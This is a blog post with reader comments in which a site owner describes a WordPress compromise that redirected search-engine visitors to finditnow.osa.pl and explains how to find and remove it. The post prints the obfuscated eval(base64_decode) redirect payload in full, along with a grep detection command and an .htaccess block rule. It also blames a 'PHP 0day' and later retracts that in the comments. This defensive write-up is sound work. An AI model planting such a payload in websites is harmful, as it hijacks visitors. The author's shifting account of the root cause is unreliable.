Late last night I realized that the traffic for Question-Defense.com was way down for the day and thought it was related to some recent updates I had performed on the site. I spent probably an hour or so last night verifying that nothing was out of the ordinary with the site and wasn’t able to find any issues. Upon waking up this morning the traffic again was extremely low for this time of the day even on a Saturday so we started to investigate. One of the referrers that traffic had dramatically decreased for was Google so we went to Google and performed a search that we knew would return a link to Question-Defense.com. Sure enough upon clicking on the link to Google we hit the question-defense.com URL and then we were immediately redirected to finditnow.osa.pl. Below we describe the issue in more detail, provide specifics about how our site was hacked, and provide the information needed to locate and resolve the problem.
- RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
- RewriteRule ^(.*)$ – [F,L]
How We Located The finditnow.osa.pl Hack:
Again after spending some time looking over recent updates to the question-defense.com site we wanted to see this from a customers aspect and went to Google to perform a search. The search we performed is noted below.
Search Performed On Google:
- xbox 360: your nat type is moderate
So when clicking the link returned by Google, which happened to be third down, we hit the question-defense.com link provided but we were immediately redirected to finditnow.osa.pl as shown in the below example picture.
Google Search Results Hijacked By finditnow.osa.pl:
When everything is functioning properly the QD results from Google should have sent the customer to the below page instead. You will notice that the hack is clever by taking the results from Google and redirecting to a new page with results on the same subject.
Google Search Results Not Hijacked By finditnow.osa.pl:
So we were able to track the issue to being on the site itself. After a short amount of time we located the PHP 0day with PHP 5.2.X which allows people to modify files hosted on the server running PHP 5.2.X. In this example the hackers performing the 0day used a clever way to not redirect all traffic and generate traffic for the osa.pl domain by only overwriting two files on a web site running WordPress to only redirect traffic from search engines. This is really clever for numerous reasons including the fact that when you are attempting to locate the issue with a downsizing in traffic to your site you are likely to go directly to your site and it will appear to function without issue. Until you perform a Google search or a search using another search engine such as Bing, Yahoo, Baidu, Search, etc. then you will think everything is working without issue.
Fix finditnow.osa.pl Hack On WordPress Site:
First off you should upgrade PHP from version 5.2.X to 5.3.X immediately which will stop the 0day from being performed on your site again. On CentOS Linux you can simply type “yum update PHP” to upgrade PHP. Make sure the upgrade takes you to 5.3.X and if not search for a Yum repo that does include a 5.3.X version of PHP. After upgrading PHP which can be done using numerous different repositories such as CHL, Atomic, and numerous others you should look in the wp-content directory located in the root of your WordPress site. The files modified in our case included advanced-cache.php and wp-cache-config.php however it may be these same files are others on your site so you should use the below command from the root of your web site to located all of the modified files.
Search For Modified Files That Redirect Users To finditnow.osa.pl:
- grep -r "eval(base64_decode" *
The above search from the root of your web site from the Linux command line should return any infected files which again on our WordPress site included advanced-cache.php and wp-cache-config.php only. Below is the snipit of PHP code added to the top of each file that performed the redirect to finditnow.osa.pl.
PHP Code Used To Redirect Users To finditnow.osa.pl:
- eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2J1eW9yZGllLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));
The above code was inserted directly after “<?php” at the top of each of the modified files. Once removed the traffic directed from Google immediately started working again. Again make sure you upgrade PHP 5.2.X to PHP 5.3.X because if not your site will continue to be manipulated in this manner and you will lose all of your search engine traffic.
Hi, noticed this on several websites over the weekend. Thank you for the post.
Hello steve,
No problem at all. Thanks for taking the time to leave feedback.
Thanks.
alex
Thanks for this. This hack has been driving me nuts. Hopefully site admins will take heed quickly.
Hello rosethorn,
No problem at all. Glad it was useful for you! Thanks for posting feedback.
Thanks.
alex
I am trying to get it off my website Joomla Do you have any suggestions??
How do you get it off Joomla Please help
Hello Eugene,
The above instructions describe the basis of the hack. The server should also be secured as mentioned in the article and I would suggest having someone more familiar with the code remove this so it doesn’t continue to happen.
Thanks.
alex
But how is hack carried out? Any other preventions we can make?
Hello Dunhamzz,
I was wrong in the inital post here where I say it relates to PHP 5.3. It appears to be a XSS scripting attack and can be blocked in .htaccess using the below lines which I obtained from the WordPress Bulletproof Security plugin.
.htaccess additions
#########
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
RewriteRule ^(.*)$ – [F,L]
#########
Thanks.
alex
I’m sorry but in htacess where I enter this line of code?
my site is in joomla
Hello istofir,
You would need to build a full set of rewrite rules which is beyond the scope of this article. If you already have the ReWrite engine turned on which you likely do for Joomla then you should be able to merge it with existing rules.
Thanks.
alex
I think this is one of the most vital info for me. And i’m glad reading your article. But should remark on few general things, The site style is wonderful, the articles is really excellent : D. Good job, cheers
Hello torture,
No problem. Thanks for taking the time to leave feedback.
Thanks.
alex
My site got hacked today. Not sure if it has anything to do with the Windows Defender Virus that was trying to scam me to buy protection. Got rid of it after disabling start up programs after starting in safe mode. Antivirus found 68 infected files after that. But these two may not be related issues.
Check your server files in each directory, sort them by date and see if any file has been recently modified. It didn’t just insert one line, I found quite a few lines of code, including the base64_decode line.
Hello Tauno,
The article notes how to search all files within the web directory using the grep command. Hope you were able to get your issue sorted.
Thanks.
alex
With today I published an important article and posting it on Google + I realized the disaster,
Thanks for the solution
Hello ZioPal,
No problem. Glad it helped out. Thanks for taking the time to post feedback.
Thanks.
alex